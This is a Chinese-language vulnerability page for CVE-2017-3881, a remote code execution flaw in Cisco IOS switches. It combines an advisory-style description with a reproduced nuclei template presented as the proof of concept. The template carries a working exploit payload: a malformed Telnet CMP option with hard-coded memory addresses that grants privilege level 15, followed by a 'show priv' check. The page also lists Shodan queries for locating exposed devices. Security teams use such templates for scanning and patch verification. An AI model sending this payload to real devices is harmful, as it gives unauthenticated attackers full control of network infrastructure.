Cisco IOS Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Cisco IOS Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2017-3881

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: 该漏洞存在于Cisco IOS和Cisco IOS XE软件的Cisco集群管理协议(CMP)处理代码中,允许未经身份验证的远程攻击者导致受影响设备重新启动或以提升的权限远程执行代码。集群管理协议内部使用Telnet作为集群成员之间的信号和命令协议。漏洞的成因包括两个因素:(1)未能限制CMP特定的Telnet选项仅用于集群成员之间的内部本地通信,而是接受并处理任何Telnet连接到受影响设备的此类选项;(2)对格式错误的CMP特定Telnet选项的错误处理。攻击者可以通过在建立与配置为接受Telnet连接的受影响Cisco设备的Telnet会话时发送格式错误的CMP特定Telnet选项来利用此漏洞。成功利用此漏洞可能允许攻击者执行任意代码并完全控制设备或导致受影响设备重新启动。受影响的设备包括Catalyst交换机、嵌入式服务2020交换机、增强型第2层以太网交换机服务模块、增强型第2/3层以太网交换机服务模块、HP的千兆以太网交换机模块(CGESM)、IE工业以太网交换机、ME 4924-10GE交换机、RF Gateway 10和SM-X第2/3层以太网交换机服务模块。此漏洞的影响极为严重,因为它允许未经身份验证的远程攻击者完全控制受影响的设备,可能导致数据泄露、服务中断或其他恶意活动。

产品厂商: Cisco

产品名称: Cisco IOS

影响版本: 12.2(55)SE11

搜索语法: product:”cisco ios http config”, cpe:”cpe:2.3:o:cisco:ios”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2017%2FCVE-2017-3881.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

id: CVE-2017-3881

info:
  name: Cisco IOS 12.2(55)SE11 - Remote Code Execution
  author: dwisiswant0, NaN@korelogic
  severity: critical
  description: |
    A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
  remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
  reference:
    - https://github.com/artkond/cisco-rce
    - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3881
    - http://www.securitytracker.com/id/1038059
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-3881
    cwe-id: CWE-20
    epss-score: 0.94083
    epss-percentile: 0.99893
    cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: cisco
    product: ios
    shodan-query:
      - product:"cisco ios http config"
      - cpe:"cpe:2.3:o:cisco:ios"
  tags: cve2017,network,cve,cisco,rce,kev,msf,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
        read: 1024

      - data: "show priv"
        read: 1024
    read-size: 1024
    matchers:
      - type: word
        words:
          - "Current privilege level is"
# digest: 4a0a00473045022027a392a3f4ae6ca700335ac106802070aee5a351ac084b511a6b865f66cc8753022100fc349039457c6ed1a9b9cb834b5a7e1e2db0d01de5e9930bee77a966ef1a009b:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
Cisco IOS Remote Code Execution Vulnerability
http://example.com/2025/07/06/github_943777533/
作者
lianccc
发布于
2025年7月6日
许可协议